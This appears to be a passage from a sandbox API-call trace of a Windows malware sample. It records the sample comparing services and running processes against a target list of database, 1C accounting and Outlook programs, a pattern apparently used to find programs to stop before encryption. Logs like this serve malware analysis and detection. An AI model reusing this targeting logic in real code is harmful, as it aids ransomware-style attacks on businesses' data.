	[0156.721] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0156.721] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0156.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0156.721] lstrlenW (lpString="DPS") returned 3
	[0156.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0156.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0156.721] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0156.721] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0156.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0156.721] lstrlenW (lpString="eventlog") returned 8
	[0156.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0156.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0156.721] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0156.721] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0156.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0156.722] lstrlenW (lpString="EventSystem") returned 11
	[0156.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0156.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0156.722] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0156.722] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0156.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0156.722] lstrlenW (lpString="gpsvc") returned 5
	[0156.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0156.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0156.722] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0156.722] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0156.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0156.722] lstrlenW (lpString="iphlpsvc") returned 8
	[0156.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0156.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0156.722] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0156.722] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0156.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0156.722] lstrlenW (lpString="LanmanServer") returned 12
	[0156.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0156.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0156.722] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0156.722] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0156.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0156.722] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0156.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0156.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0156.722] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0156.722] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0156.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0156.723] lstrlenW (lpString="lmhosts") returned 7
	[0156.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0156.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0156.723] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0156.723] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0156.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0156.723] lstrlenW (lpString="MMCSS") returned 5
	[0156.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0156.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0156.723] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0156.723] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0156.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0156.723] lstrlenW (lpString="MpsSvc") returned 6
	[0156.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0156.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0156.723] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0156.723] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0156.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0156.723] lstrlenW (lpString="NlaSvc") returned 6
	[0156.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0156.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0156.723] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0156.723] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0156.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0156.723] lstrlenW (lpString="nsi") returned 3
	[0156.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0156.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0156.723] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0156.723] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0156.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0156.724] lstrlenW (lpString="PcaSvc") returned 6
	[0156.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0156.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0156.724] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0156.724] lstrlenW (lpString="PlugPlay") returned 8
	[0156.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0156.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0156.724] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0156.724] lstrlenW (lpString="Power") returned 5
	[0156.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0156.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0156.724] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0156.724] lstrlenW (lpString="ProfSvc") returned 7
	[0156.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0156.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0156.724] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0156.724] lstrlenW (lpString="RpcEptMapper") returned 12
	[0156.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0156.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0156.724] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0156.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0156.724] lstrlenW (lpString="RpcSs") returned 5
	[0156.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0156.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0156.725] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0156.725] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0156.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0156.725] lstrlenW (lpString="SamSs") returned 5
	[0156.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0156.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0156.725] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0156.725] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0156.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0156.725] lstrlenW (lpString="Schedule") returned 8
	[0156.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0156.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0156.725] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0156.725] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0156.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0156.725] lstrlenW (lpString="SENS") returned 4
	[0156.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0156.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0156.725] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0156.725] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0156.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0156.725] lstrlenW (lpString="ShellHWDetection") returned 16
	[0156.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0156.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0156.726] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0156.726] lstrlenW (lpString="Spooler") returned 7
	[0156.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0156.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0156.726] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0156.726] lstrlenW (lpString="SysMain") returned 7
	[0156.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0156.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0156.726] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0156.726] lstrlenW (lpString="Themes") returned 6
	[0156.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0156.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0156.726] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0156.726] lstrlenW (lpString="TrkWks") returned 6
	[0156.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0156.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0156.726] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0156.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0156.726] lstrlenW (lpString="UxSms") returned 5
	[0156.727] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0156.727] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0156.727] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0156.727] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0156.727] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0156.727] lstrlenW (lpString="Winmgmt") returned 7
	[0156.727] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0156.727] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0156.727] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0156.727] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0156.727] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0156.727] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0156.727] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388
	[0156.729] Process32FirstW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0156.729] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0156.729] lstrlenW (lpString="System") returned 6
	[0156.729] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0156.729] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0156.729] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0156.729] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0156.729] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0156.729] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0156.729] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0156.729] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0156.730] lstrlenW (lpString="smss.exe") returned 8
	[0156.730] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0156.730] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0156.730] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0156.730] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0156.731] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0156.731] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0156.731] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0156.731] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0156.731] lstrlenW (lpString="csrss.exe") returned 9
	[0156.731] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0156.731] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0156.731] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0156.731] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0156.731] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0156.731] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0156.731] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0156.731] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0156.731] lstrlenW (lpString="wininit.exe") returned 11
	[0156.731] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0156.731] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0156.732] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0156.732] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0156.732] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0156.732] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0156.732] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0156.732] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0156.732] lstrlenW (lpString="csrss.exe") returned 9
	[0156.732] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0156.732] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0156.732] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0156.732] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0156.732] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0156.732] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0156.732] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0156.732] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0156.732] lstrlenW (lpString="winlogon.exe") returned 12
	[0156.733] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0156.733] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0156.733] lstrlenW (lpString="services.exe") returned 12
	[0156.733] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0156.733] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0156.733] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0156.734] lstrlenW (lpString="lsass.exe") returned 9
	[0156.734] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0156.734] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0156.734] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0156.734] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0156.734] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0156.734] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0156.734] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0156.734] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0156.734] lstrlenW (lpString="lsm.exe") returned 7
	[0156.734] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0156.734] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0156.734] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0156.734] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0156.734] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0156.734] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0156.734] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0156.734] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0156.735] lstrlenW (lpString="svchost.exe") returned 11
	[0156.735] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0156.735] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0156.735] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0156.735] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0156.735] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0156.735] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0156.735] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0156.735] lstrlenW (lpString="svchost.exe") returned 11
	[0156.735] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0156.736] lstrlenW (lpString="svchost.exe") returned 11
	[0156.736] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0156.736] lstrlenW (lpString="svchost.exe") returned 11
	[0156.736] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0156.736] lstrlenW (lpString="svchost.exe") returned 11
	[0156.736] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0156.737] lstrlenW (lpString="audiodg.exe") returned 11
	[0156.737] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0156.737] lstrlenW (lpString="svchost.exe") returned 11
	[0156.737] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0156.737] lstrlenW (lpString="svchost.exe") returned 11
	[0156.737] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0156.738] lstrlenW (lpString="spoolsv.exe") returned 11
